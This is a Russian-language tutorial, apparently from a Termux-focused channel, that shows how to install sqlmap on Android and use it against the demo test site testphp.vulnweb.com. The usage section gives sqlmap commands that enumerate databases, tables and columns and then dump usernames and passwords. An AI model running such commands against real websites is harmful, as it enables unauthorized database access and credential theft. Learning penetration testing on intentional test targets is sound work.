Как установить и использовать SQLmap в Termux

Как установить и использовать SQLmap в Termux

Termux - one ❤️
Termux - one ❤️
Прошу обратить внимание! Автор данной статьи не несёт ответственности за любые последствия вслед использования предоставленной информации. Все материалы опубликованы исключительно в образовательных целях!

Что такое SQLmap?

SQL-инъекция - один из самых распространенных методов атаки при этическом взломе . Если хакеры вводят код в поле ввода любого веб-сайта, и если этот сайт уязвим, они могут воспользоваться им и получить все данные в базе данных.

Итак, чтобы сделать наши веб-сайты устойчивыми к SQL-инъекции, мы можем протестировать наш веб-сайт, выполнив на нем SQL-инъекцию, но может потребоваться много времени, чтобы узнать обо всех кодах SQL и затем протестировать на нашем сайте. поэтому для решения этой проблемы мы используем SQLmap. SQLmap - это инструмент, созданный на языке Python, и с помощью этого инструмента мы можем автоматизировать задачу проверки уязвимости SQL на нашем веб-сайте.

Как установить SQLmap в Termux?

Чтобы установить SQLmap в termux, вы можете скопировать и вставить следующие команды, и он будет установлен на вашем телефоне.

Перед установкой SQLmap в свой termux вы должны обновить и обновить, чтобы убедиться, что все пакеты обновлены, если вы пропустите эту команду, это может вызвать ошибки некоторое время.
apt update && apt upgrade -y

Этот шаг обновит все зависимости в приложении Termux.

Теперь нам нужно установить git в termux, чтобы загрузить SQLmap в termux из репозитория GitHub, а также нам нужно установить python2 в termux, потому что инструмент SQLmap написан на языке python.

pkg install git python python2 -y
Эта команда установит Git и Python в ваш termux. 

Теперь мы клонируем реальный инструмент SQLmap из репозитория Github с помощью команды git. Общий размер этого инструмента составляет 60 МБ, и его установка может занять некоторое время, в зависимости от скорости загрузки.

git clone https://github.com/sqlmapproject/sqlmap

Перейдите в папку sqlmap

cd sqlmap

Все готово! Вам нужно только ввести команду ниже, чтобы проверить, все ли работает нормально или нет.

python2 sqlmap.py

Теперь, если вы видите этот экран, это означает, что инструмент правильно установлен и вы можете начать его использовать. Ниже вы можете использовать базовое использование инструмента SQLmap. 

Termux - one ❤️

Как использовать SQLmap в Termux?

После выполнения вышеуказанной установки вы окажетесь в папке SQLmap, но если вы не находитесь в папке, которую вам нужно сначала переместить, вы можете использовать приведенную ниже команду для проверки базы данных веб-сайта. 

python2 sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
В приведенной выше команде, если вы хотите, вы можете изменить ее на свой сайт для целей тестирования.

Эта команда покажет вам список всех баз данных для сайта.

Теперь выберите базу данных из списка, в котором, по вашему мнению, будут находиться важные файлы, и в приведенной ниже команде измените зеленую часть на имя вашей базы данных.

python2 sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?cat=  -D acuart --tables
Termux - one ❤️
Эта команда предоставит вам список таблиц в базе данных, как на этом рисунке
Termux - one ❤️

Теперь выберите любую базу данных. В моем случае я попытаюсь найти идентификатор и пароль из базы данных, поэтому я выбираю таблицу пользователей. поэтому в этой команде мы собираемся найти все столбцы в папках пользователей

python2 sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?cat=  -D acuart -T users --columns
Эта команда предоставит вам все столбцы в таблице Users.
Termux - one ❤️

Мы почти закончили, теперь мы знаем путь к файлам и можем просто выгрузить их. Сначала я собираюсь выгрузить все имена пользователей из базы данных. Просто введите следующие команды, и он сбросит базу данных, но если вы делаете это на своем веб-сайте, убедитесь, что вы изменили переменную часть команды (зеленые части).

python2 sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?cat=  -D acuart -T users -C uname --dump
Termux - one ❤️

Теперь вы увидите таблицу имен пользователей. На этом веб-сайте есть только одно имя пользователя, поэтому вы можете увидеть имя пользователя на рисунке ниже. 

Termux - one ❤️

Мы будем использовать ту же команду для получения паролей из базы данных.

python2 sqlmap.py -u  http://testphp.vulnweb.com/listproducts.php?cat=  -D acuart -T users -C pass --dump
Здесь вы можете увидеть, что я получил пароль от имени пользователя на изображении ниже.
Termux - one ❤️
Termux - one ❤️

Report Page